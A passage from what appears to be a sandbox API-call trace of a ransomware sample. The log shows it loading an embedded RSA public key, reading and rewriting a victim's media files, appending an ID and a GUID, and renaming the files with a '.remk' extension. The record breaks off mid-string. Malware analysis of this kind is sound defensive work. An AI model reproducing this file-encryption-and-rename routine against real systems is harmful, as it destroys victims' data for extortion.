KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.865] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.866] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.866] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.866] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.866] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.866] GetLastError () returned 0x0 [0237.866] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.866] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.867] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.867] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.867] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.867] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcab0 [0237.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bca98 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.868] GetCurrentThreadId () returned 0x314 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6e60 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.869] GetCurrentThreadId () returned 0x314 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb28 [0237.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcac8 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0237.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf528 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.874] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xd659, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xd659, lpOverlapped=0x0) returned 1 [0237.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.875] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd65e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.875] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.876] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.876] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.876] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.876] CloseHandle (hObject=0x640) returned 1 [0237.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0237.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0237.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a2d00 | out: hHeap=0x630000) returned 1 [0237.878] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\cnAJanV1kmNfWz8.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\cnajanv1kmnfwz8.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\cnAJanV1kmNfWz8.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\cnajanv1kmnfwz8.swf.remk")) returned 1 [0237.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.880] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.881] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46e56f90, ftCreationTime.dwHighDateTime=0x1d5d8fb, ftLastAccessTime.dwLowDateTime=0xac544580, ftLastAccessTime.dwHighDateTime=0x1d5e586, ftLastWriteTime.dwLowDateTime=0xac544580, ftLastWriteTime.dwHighDateTime=0x1d5e586, nFileSizeHigh=0x0, nFileSizeLow=0xefa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pEQk.flv", cAlternateFileName="")) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0237.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0237.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185cc8 | out: hHeap=0x630000) returned 1 [0237.881] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\pEQk.flv") returned=".flv" [0237.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\pEQk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\peqk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.882] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=61348) returned 1 [0237.882] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.884] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xef7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.884] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.886] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.886] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xefa4, lpOverlapped=0x0) returned 1 [0237.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.888] lstrlenA (lpString="-----BEGIN PUBLIC 